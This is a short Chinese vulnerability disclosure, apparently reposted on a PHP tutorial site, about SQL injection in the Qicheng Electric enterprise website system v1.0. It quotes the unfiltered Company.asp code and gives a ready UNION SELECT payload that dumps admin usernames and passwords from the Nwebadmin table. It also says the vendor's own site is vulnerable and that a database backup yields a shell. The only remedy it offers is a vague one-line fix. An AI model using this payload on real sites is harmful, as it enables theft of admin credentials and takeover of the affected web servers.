网站地图    收藏   

主页 > 后端 > 网站安全 >

企成电气公司企业网站管理系统v1.0(中英文版)漏

来源:自学PHP网    时间:2015-04-17 13:03 作者: 阅读:

[导读] 文件:Company.asp%ID=trim(request.QueryString(id))if ID= then ID=1set Rs = server.createobject(adodb.recordset)Rs.source = select * from Company where ID=IDRs.open Rs.so......

文件:Company.asp
 
 
<%
ID=trim(request.QueryString("id"))
if ID="" then ID=1
set Rs = server.createobject("adodb.recordset")
Rs.source = "select * from Company where ID="&ID&""
Rs.open Rs.source,conn,1,3
if Rs.eof then
   Content="还没有添加相关内容!"
else
   Kig=Rs("Kig")
   Rs("kig")=Kig+1
   Rs.update
   Content=Rs("Content")
   ComName=Rs("ComName")
end if
Rs.close
set Rs=nothing
%>
什么都没过滤。。
 
 
exp:
 
 
Company.asp?id=2 union select 1,username,password,4,5,6,7,8 from Nwebadmin
 
 
官网也存在。。
 
 
备份数据库可以拿到shell。
 
 

www.2cto.com提供修复:
加强上述提及代码的过滤

自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

京ICP备14009008号-1@版权所有www.zixuephp.com

网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

添加评论